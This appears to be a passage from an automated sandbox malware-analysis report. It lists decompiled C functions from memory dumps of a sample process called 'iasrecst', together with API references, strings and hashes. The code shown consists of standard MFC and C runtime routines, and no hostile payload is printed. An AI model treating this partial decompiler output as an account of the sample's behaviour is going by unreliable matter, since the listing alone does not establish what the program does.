					if(_v8 == 0) {
						 *_t67 =  *_t67 | 0x00000040;
					} else {
						_t67[3] = _t67[3] | 0x00000040;
					}
					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
					_t84 = E00416E50(_t67);
					_t75 = 0;
					_v20 = _t84;
					if(_v16 != 0) {
						_t22 = E00406A48(_t84 + _t93) * 2; // 0x3
						_t75 = _t93 + _t22 + 2;
					}
					_t26 = _t84 + 3; // 0x6
					_t55 = _t75 + _t26 & 0x000000fc;
					_v16 = _t75 + _t26 & 0x000000fc;
					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
					if(_v8 == 0) {
						_t81 = _t67[2];
					} else {
						_t81 = _t67[4];
					}
					if(_a4 != _t75 && _t81 > 0) {
						E00405EA0(_t86, _t55, _t67 - _t55 + _v12[1]);
						_t96 = _t96 + 0xc;
					}
					 *_v20 = _a8;
					E00405EA0(_v20 + _t93,  &_v84, _a4 - _t93);
					_t94 = _v12;
					_t94[1] = _t94[1] + _t86 - _v16;
					GlobalUnlock( *_t94);
					_t94[2] = _t94[2] & 0x00000000;
					_t61 = 1;
					return _t61;
				}
				return 0;
			}

APIs

GlobalLock.KERNEL32 ref: 00416FE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0041703C
GlobalUnlock.KERNEL32(?), ref: 004170D3

Strings

System, xrefs: 00416FD3

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Global$ByteCharLockMultiUnlockWide
String ID: System
API String ID: 231414890-3470857405
Opcode ID: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
Instruction ID: c2f8acceaa533c94d1390ef28e6fe5bddd73ae44c4aad8fbd6ca481d2bb84418
Opcode Fuzzy Hash: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
Instruction Fuzzy Hash: 9741E872904305EFCB10DFA4C8859EF7BB5FF44354F50816AE815AB284D3399A86CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004227B5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004227B5(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x6c)) == 0) {
					L6:
					if(( *(_t71 + 0x64) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0x0000002f | 0x00000020;
						}
					}
					_t74 = E004225E5(_v8, _t77, _a16);
					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *((intOrPtr*)(_t74 + 0x20)) == 0) {
						_t29 = _t71 + 0x1c; // 0x9630a380
						 *((intOrPtr*)(_t74 + 0x20)) =  *_t29;
					}
					E0041D196(E0041649C(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					_t32 = _t71 + 0x1c; // 0x9630a380
					_t42 = GetWindowLongA( *_t32, 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E0041668C(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t4 = _t71 + 0x70; // 0xc8b8c35e
				_t76 =  *_t4;
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x78)) == 0 || E0041D12E(_t76) != 1 || ( *(_t76 + 0x64) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E00413740(_t77, GetParent( *(_t76 + 0x1c)));
					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					goto L13;
				}
			}

APIs

GetParent.USER32(?), ref: 004227EF

Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664

GetWindowLongA.USER32 ref: 0042288C
UpdateWindow.USER32(?), ref: 004228A5

Strings

P, xrefs: 0042282A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$LongParentUpdate
String ID: P
API String ID: 1906497633-3110715001
Opcode ID: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
Instruction ID: 4478c7b2db2806f657cab283070aca1dc542ec48e340ed71b02adf3b0aace616
Opcode Fuzzy Hash: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
Instruction Fuzzy Hash: C631F371700614BFDB21AF25DD48BAF7BA8FF04704F40062AF9015A2A1CB79EC51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004244A1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004244A1(void* __edx) {
				signed char* _v8;
				char _v12;
				int _v16;
				void _v148;
				unsigned int _t20;
				int _t26;
				signed int _t36;
				struct HINSTANCE__* _t38;
				struct HBITMAP__* _t39;
				int _t41;
				unsigned int _t43;
				void* _t47;
				signed int* _t48;
				signed int _t53;
				signed int _t57;
				void* _t58;
				void* _t60;

				_t47 = __edx;
				_t20 = GetMenuCheckMarkDimensions();
				_t41 = _t20;
				_t43 = _t20 >> 0x10;
				_v16 = _t43;
				if(_t41 > 0x20) {
					_t41 = 0x20;
				}
				asm("cdq");
				_t57 = _t41 + 0xf >> 4;
				_t53 = (_t41 - 4 - _t47 >> 1) + (_t57 << 4) - _t41;
				if(_t53 > 0xc) {
					_t53 = 0xc;
				}
				_t26 = 0x20;
				if(_t43 > _t26) {
					_v16 = _t26;
				}
				E00406330( &_v148, 0xff, 0x80);
				_v8 = 0x42c00c;
				_t58 = _t57 + _t57;
				_v12 = 5;
				_t48 = _t60 + (_v16 + 0xfffffffa >> 1) * _t57 * 2 - 0x90;
				do {
					_v8 =  &(_v8[1]);
					_t36 =  !(( *_v8 & 0x000000ff) << _t53);
					_t48[0] = _t36;
					 *_t48 = _t36;
					_t48 = _t48 + _t58;
					_t16 =  &_v12;
					 *_t16 = _v12 - 1;
				} while ( *_t16 != 0);
				_t38 = CreateBitmap(_t41, _v16, 1, 1,  &_v148);
				 *0x439c30 = _t38;
				if(_t38 == 0) {
					_t39 = LoadBitmapA(_t38, 0x7fe3);
					 *0x439c30 = _t39;
					return _t39;
				}
				return _t38;
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 004244AD
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042455C
LoadBitmapA.USER32 ref: 00424574

Strings

, xrefs: 004244BC

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
Instruction ID: 209a20424c1af6e272a19c9ebc2633acba681278a5e608b332d2eb8150819f76
Opcode Fuzzy Hash: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
Instruction Fuzzy Hash: 39213A72F00225AFDB20DB78DC85BAEBBB4EB80304F454167E945EB282D7749A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E47A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040E47A(void* __ecx) {
				signed int _t22;
				signed char _t36;
				char* _t43;
				void* _t45;

				E00406520(E0042AE14, _t45);
				_t22 =  *(_t45 + 8) & 0x00000007;
				 *(__ecx + 4) = _t22;
				_t36 =  *(__ecx + 8) & _t22;
				if(_t36 != 0) {
					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
						E004067EC(0, 0);
					}
					_t52 = _t36 & 0x00000004;
					if((_t36 & 0x00000004) == 0) {
						__eflags = _t36 & 0x00000002;
						_t43 = "ios::failbit set";
						if((_t36 & 0x00000002) == 0) {
							_t43 = "ios::eofbit set";
						}
					} else {
						_t43 = "ios::badbit set";
					}
					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
					E00401AE0(_t45 - 0x1c, 0);
					E00401B90(_t45 - 0x1c, _t43, E00405A40(_t43));
					_push(_t45 - 0x1c);
					 *((intOrPtr*)(_t45 - 4)) = 0;
					E0040E516(_t45 - 0x38, _t52);
					 *((intOrPtr*)(_t45 - 0x38)) = 0x42f8c4;
					_t22 = E004067EC(_t45 - 0x38, 0x433890);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t22;
			}

APIs

__EH_prolog.LIBCMT ref: 0040E47F

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

Strings

ios::badbit set, xrefs: 0040E4AC
ios::failbit set, xrefs: 0040E4B6
ios::eofbit set, xrefs: 0040E4BD, 0040E4D1, 0040E4D9

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
Instruction ID: 058c2687817cbb3025356127984514509d88e2cf1c36159cda0efedd272f4144
Opcode Fuzzy Hash: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
Instruction Fuzzy Hash: E41173B2D015196EC700EBA2D891AEEB778AF04358F44847BF41677282D77C5919CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00418BE2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418BE2(void* __eflags) {
				intOrPtr _t22;
				intOrPtr _t45;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				E00406520(E00429FAB, _t47);
				_t22 =  *0x436980; // 0x436994
				 *((intOrPtr*)(_t47 - 0x14)) = 0;
				 *((intOrPtr*)(_t47 - 0x10)) = _t22;
				_t45 = 1;
				 *((intOrPtr*)(_t47 - 4)) = _t45;
				GetFullPathNameA( *(_t47 + 0xc), 0x104, _t47 - 0x118, _t47 + 0xc);
				 *( *(_t47 + 0xc)) = 0;
				GetTempFileNameA(_t47 - 0x118, "MFC", 0, E00416CC1(_t47 - 0x10, _t47, 0x105));
				E00416D10(_t47 - 0x10, _t52, 0xffffffff);
				if( *((intOrPtr*)(_t47 + 0x10)) == 0) {
					E00417B0B( *((intOrPtr*)(_t47 - 0x10)));
				}
				E00416861( *((intOrPtr*)(_t47 + 8)), _t47 - 0x10);
				 *((intOrPtr*)(_t47 - 0x14)) = _t45;
				 *((char*)(_t47 - 4)) = 0;
				E00416AEC(_t47 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return  *((intOrPtr*)(_t47 + 8));
			}

APIs

__EH_prolog.LIBCMT ref: 00418BE7
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40

Part of subcall function 00416D10: lstrlenA.KERNEL32(00000000,?,00416FC8,000000FF,?,00411ED7,?,?,?,0003C000,00000010,00000000,?,?), ref: 00416D23

Part of subcall function 00417B0B: DeleteFileA.KERNEL32(?), ref: 00417B0F
Part of subcall function 00417B0B: GetLastError.KERNEL32(00000000), ref: 00417B1A

Strings

MFC, xrefs: 00418C3A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: FileName$DeleteErrorFullH_prologLastPathTemplstrlen
String ID: MFC
API String ID: 501224598-3472178984
Opcode ID: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
Instruction ID: 106d24b416a7ad35a8895af97b87cb9fb89e8d85cfd421907a0314e2615bf241
Opcode Fuzzy Hash: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
Instruction Fuzzy Hash: 90114FB1A01219EFCF00EF94DC819EEB778FF04354F01456AF925A7290DB749A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042514B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0042514B() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x43687c; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E00406330( &_v24, 0, 0x14);
					_v24 = 0x14;
					_push( &_v24);
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x43687c = _t19;
				return _t19;
			}

0x00425151
0x00425159
0x004251b8
0x004251b8
0x00425174
0x00425176
0x0042517d
0x00425187
0x00425192
0x00425199
0x0042519e
0x004251ab
0x004251ab
0x0042519e
0x004251ad
0x00000000

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,004036DA,?,?,004036DA,?,00000800,50402834,?,?,0000E800,?), ref: 00425162
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0042516E

Strings

DllGetVersion, xrefs: 00425168
COMCTL32.DLL, xrefs: 0042515D

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: COMCTL32.DLL$DllGetVersion
API String ID: 1646373207-1518460440
Opcode ID: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
Instruction ID: 98511304bc6decc3b615f85e9ad6552c3d683fa4d8a624641396a172b3716892
Opcode Fuzzy Hash: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
Instruction Fuzzy Hash: 61F04FB1F013396BE71097E9AC45BAA77A89B08754F910532EA10F3290E6B4D90487F9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A759, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A759(struct HWND__* _a4, intOrPtr _a8) {
				char _v16;
				signed int _t13;

				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					return 0;
				} else {
					GetClassNameA(_a4,  &_v16, 0xa);
					_t13 = lstrcmpiA( &_v16, "combobox");
					asm("sbb eax, eax");
					return  ~_t13 + 1;
				}
			}

0x0041a763
0x00000000
0x0041a77c
0x0041a785
0x0041a794
0x0041a79c
0x00000000
0x0041a79e

APIs

GetWindowLongA.USER32 ref: 0041A76A
GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794

Strings

combobox, xrefs: 0041A78E

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
Instruction ID: 62da548da4bc7eed7f0096d352448fc276db36428101ee4b016d1f9566c4e5fc
Opcode Fuzzy Hash: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
Instruction Fuzzy Hash: 66E0E53164020CBFCF219F60CC49F9D37B8E700305F508222B422D50E0D774E2968B99

Uniqueness

Uniqueness Score: -1.00%

Function 022821A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 022821F9
SetLastError.KERNEL32(0000007E), ref: 0228223B

Memory Dump Source

Source File: 00000001.00000002.496560392.0000000002281000.00000020.00000001.sdmp, Offset: 02281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2281000_iasrecst.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 5039c88e02613e3c3b10e19c0348430a91d2715957884f521e1f5c31109cf0c9
Instruction ID: ce651ddfe3bf9de24adc9bf37ac7ba9e03fa842f182b0dda733c36b937b469e9
Opcode Fuzzy Hash: 5039c88e02613e3c3b10e19c0348430a91d2715957884f521e1f5c31109cf0c9
Instruction Fuzzy Hash: 2981CA74A11249EFDB04DF94C894BADB7B1FF48314F248298E909AB395C774EA81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD44, Relevance: 6.2, APIs: 4, Instructions: 170
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FD44(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t75;
				void* _t78;
				intOrPtr _t82;
				signed char _t83;
				signed char _t85;
				long _t86;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed int _t95;
				intOrPtr _t96;
				char _t98;
				signed int _t99;
				long _t101;
				long _t102;
				signed int _t103;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed char _t112;
				signed char* _t113;
				long _t115;
				void* _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed char* _t124;
				void* _t125;
				void* _t126;

				_v12 = _v12 & 0x00000000;
				_t108 = _a8;
				_t119 = _t108;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t75 = _a4;
				_t111 = _t75 >> 5;
				_t121 = 0x43b520 + _t111 * 4;
				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
				_t78 =  *((intOrPtr*)(0x43b520 + _t111 * 4)) + _t123;
				_t112 =  *((intOrPtr*)(_t78 + 4));
				if((_t112 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t112 & 0x00000048) != 0) {
					_t106 =  *((intOrPtr*)(_t78 + 5));
					if(_t106 != 0xa) {
						_a12 = _a12 - 1;
						 *_t108 = _t106;
						_t119 = _t108 + 1;
						_v12 = 1;
						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
					}
				}
				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
					_t82 =  *_t121;
					_t120 = _v16;
					_v12 = _v12 + _t120;
					_t31 = _t123 + 4; // 0x4
					_t113 = _t82 + _t31;
					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
					__eflags = _t83 & 0x00000080;
					if((_t83 & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t120;
					if(_t120 == 0) {
						L15:
						_t85 = _t83 & 0x000000fb;
						__eflags = _t85;
						L16:
						 *_t113 = _t85;
						_t86 = _a8;
						_a12 = _t86;
						_t115 = _v12 + _t86;
						__eflags = _t86 - _t115;
						_v12 = _t115;
						if(_t86 >= _t115) {
							L40:
							_t109 = _t108 - _a8;
							__eflags = _t109;
							_v12 = _t109;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t88 =  *_a12;
							__eflags = _t88 - 0x1a;
							if(_t88 == 0x1a) {
								break;
							}
							__eflags = _t88 - 0xd;
							if(_t88 == 0xd) {
								__eflags = _a12 - _t115 - 1;
								if(_a12 >= _t115 - 1) {
									_a12 = _a12 + 1;
									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t108 = 0xd;
											L35:
											_t108 = _t108 + 1;
											__eflags = _t108;
											L36:
											_t115 = _v12;
											__eflags = _a12 - _t115;
											if(_a12 < _t115) {
												continue;
											}
											goto L40;
										}
										_t96 =  *_t121;
										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
											__eflags = _t108 - _a8;
											if(__eflags != 0) {
												L33:
												E0040AE93(__eflags, _a4, 0xffffffff, 1);
												_t126 = _t126 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t108 = 0xa;
											goto L35;
										}
										_t98 = _v5;
										__eflags = _t98 - 0xa;
										if(_t98 == 0xa) {
											goto L32;
										}
										 *_t108 = 0xd;
										_t108 = _t108 + 1;
										 *((char*)( *_t121 + _t123 + 5)) = _t98;
										goto L36;
									}
									_t99 = GetLastError();
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t101 = _a12 + 1;
								__eflags =  *_t101 - 0xa;
								if( *_t101 != 0xa) {
									 *_t108 = 0xd;
									_t108 = _t108 + 1;
									_a12 = _t101;
									goto L36;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t108 = _t88;
							_t108 = _t108 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t124 =  *_t121 + _t123 + 4;
						_t90 =  *_t124;
						__eflags = _t90 & 0x00000040;
						if((_t90 & 0x00000040) == 0) {
							_t91 = _t90 | 0x00000002;
							__eflags = _t91;
							 *_t124 = _t91;
						}
						goto L40;
					}
					__eflags =  *_t108 - 0xa;
					if( *_t108 != 0xa) {
						goto L15;
					}
					_t85 = _t83 | 0x00000004;
					goto L16;
				}
				_t102 = GetLastError();
				_t125 = 5;
				if(_t102 != _t125) {
					__eflags = _t102 - 0x6d;
					if(_t102 == 0x6d) {
						goto L42;
					}
					_t103 = E00406F05(_t102);
					L10:
					return _t103 | 0xffffffff;
				}
				 *((intOrPtr*)(E00406F78())) = 9;
				_t103 = E00406F81();
				 *_t103 = _t125;
				goto L10;
			}

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 0040FDBE
GetLastError.KERNEL32(?,?), ref: 0040FDC8
ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?), ref: 0040FE8E
GetLastError.KERNEL32(?,?), ref: 0040FE98

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
Instruction ID: d01b3c0b8dd5da0b8901ede80a7d7d1cd1fd8d123d1325fb95f4599fb7a38ff2
Opcode Fuzzy Hash: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
Instruction Fuzzy Hash: 7051C7306043859FDF31CF58C88479A7BB0EF12304F5445BBE851AB6E2D378994ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCEC, Relevance: 6.1, APIs: 4, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041FCEC(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t79;
				int _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t106;
				int _t120;
				void* _t128;
				void* _t132;
				intOrPtr _t138;
				void* _t140;
				void* _t143;

				_t140 = __edi;
				_t128 = __ecx;
				_t79 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t132 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t138 =  *((intOrPtr*)(__ecx + 0x8c));
				_t143 = 2;
				if(_t138 == 0xa) {
					L7:
					 *((intOrPtr*)(_t128 + 0x28)) =  *((intOrPtr*)(_t128 + 0x28)) + _t79;
					L9:
					_t81 =  *((intOrPtr*)(_t128 + 0x30)) -  *((intOrPtr*)(_t128 + 0x28));
					__eflags = _t81;
					L10:
					if(_t81 < 0) {
						_t81 = 0;
					}
					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x68)))) + 0xbc))( &(_v28.right), _t81, _t143, _t140);
					_v12 =  *_t83;
					_v8 =  *((intOrPtr*)(_t83 + 4));
					GetWindowRect(GetDesktopWindow(),  &_v60);
					asm("movsd");
					asm("movsd");
					_t87 =  *((intOrPtr*)(_t128 + 0x8c));
					asm("movsd");
					asm("movsd");
					if(_t87 == 0xa || _t87 == 0xc) {
						_v44.left =  *((intOrPtr*)(_t128 + 0x58)) -  *((intOrPtr*)(_t128 + 0x60)) - _v12 + _v44.right;
						_v44.top =  *((intOrPtr*)(_t128 + 0x5c)) -  *((intOrPtr*)(_t128 + 0x64)) - _v8 + _v44.bottom;
						__eflags = IntersectRect( &_v28,  &_v60,  &_v44);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t128 + 0x38)) =  *((intOrPtr*)(_t128 + 0x40)) - _v12;
							_t106 =  *((intOrPtr*)(_t128 + 0x44)) - _v8;
							__eflags = _t106;
